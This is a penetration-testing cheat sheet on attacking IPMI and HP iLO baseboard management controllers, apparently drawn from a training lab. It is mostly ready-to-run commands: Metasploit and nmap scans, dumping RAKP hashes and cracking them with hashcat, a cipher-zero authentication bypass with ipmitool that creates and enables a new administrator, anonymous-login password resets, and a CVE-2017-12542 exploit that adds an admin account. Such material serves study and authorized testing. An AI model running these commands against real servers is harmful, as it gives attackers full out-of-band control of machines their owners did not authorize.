IPMI ( 623 )

Resources

• IPMI Deep Dive
  • What is IPMI : https://www.trentonsystems.com/en-us/resource-hub/blog/what-is-ipmi
  • By latesthackingnews : https://latesthackingnews.com/2018/12/29/hackers-attack-ipmi-default-passwords-to-deploy-ransomware-on-linux-servers/
  • From Proxmox : https://forum.proxmox.com/threads/hacked-proxmox-server.123594/
  • By habr : https://habr.com/en/companies/selectel/articles/439834/
  • Privileges : https://serverfault.com/questions/785872/ipmitool-insufficient-privilege-level-for-administrator
• Exploitation
  • By 7l8skm5e : https://medium.com/@7l8skm5e/mastering-ipmi-a-comprehensive-guide-to-intelligent-platform-management-interface-2aeea5028f7d
  • By mohamedmrjamal : https://medium.com/@mohamedmrjamal/understanding-ipmi-the-key-to-remote-server-management-and-its-hidden-risks-f27dddf34fd7
  • By Very lazy tech : https://medium.com/render-beyond/ipmi-port-623-udp-tcp-how-to-exploit-4655ec015a0b
  • By rapid7 : https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/
  • CVE-2013-4786 : https://www.twingate.com/blog/tips/cve-2013-4786
  • By codeby : https://codeby.net/threads/poluchayem-dostup-k-hp-ilo.63224/

Cheat sheet

• By otterhacker : https://otterhacker.github.io/Pentest/Services/IPMI.html
• By snovvcra.sh : https://ppn.snovvcra.sh/pentest/infrastructure/ipmi

Commands

• Scaning

  nmap -sU --script ipmi-version -p 623 10.129.202.5
  msf > auxiliary/scanner/ipmi/ipmi_version\

• CVE-2013-4786 Dump Hashes

  msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
  hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username

• CVE-2013-480 Cipher_Zero

  msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
   
  ipmitool -I lanplus -C 0 -H 10.129.3.207 -U admin -P DummyPassw0rd user list
  ipmitool -I lanplus -C 0 -H 10.129.3.207 -U admin -P DummyPassw0rd user set name 64 fady
  ipmitool -I lanplus -C 0 -H 10.129.3.207 -U admin -P DummyPassw0rd user set password 63 'Passw0rd!'
  ipmitool -I lanplus -C 0 -H 10.129.3.207 -U admin -P DummyPassw0rd user priv 63 4
  ipmitool -I lanplus -C 0 -H 10.129.3.207 -U admin -P DummyPassw0rd user enable 63

WARNING

Guess existing admin username. If admin username is correct, the list command will succeed (password doesn’t matter):

• Anonymous Auth

  # Can be discovered with MSF `ipmi_dumphashes`
  ipmitool -I lanplus -H 10.129.3.207 -U '' -P '' user list
  ipmitool -I lanplus -H 10.129.3.207 -U '' -P '' user set password <ID> 'Passw0rd!'

• CVE-2017-12542

  ./44005.py 10.129.3.207 -t -e -u fady -p "Password123#f"
  # OR
  msf > use auxiliary/admin/hp/hp_ilo_create_admin_account

• IPMI cheat sheet

  ipmitool -I lanplus -C 0 -H 10.129.3.207 -U fady -P 'Passw0rd!' mc info

Tools

• CosmicRakp : https://github.com/fin3ss3g0d/CosmicRakp
• 44005.py : https://www.exploit-db.com/exploits/44005
• ilo4_toolbox : https://github.com/airbus-seclab/ilo4_toolbox

Notes

Common Ports

• UDP 623: The core port for IPMI commands (RMCP protocol). This is how most IPMI remote management traffic flows.
• UDP 664: Used for secure RMCP+ communication in newer IPMI versions (2.0+), which encrypt data.
• TCP 80 and 443: Web interfaces to access IPMI (HTTP or HTTPS). Sometimes admins expose these to access IPMI dashboards.
• TCP 5900–5999: Ports used for KVM-over-IP, which allows you to see and control the server’s screen and keyboard remotely.
• TCP 5120, 5123, 6230: Virtual media and remote console redirection (vendor-specific).

IPMI is typically used in three ways:

• Before the OS has booted to modify BIOS settings
• When the host is fully powered down
• Access to a host after a system failure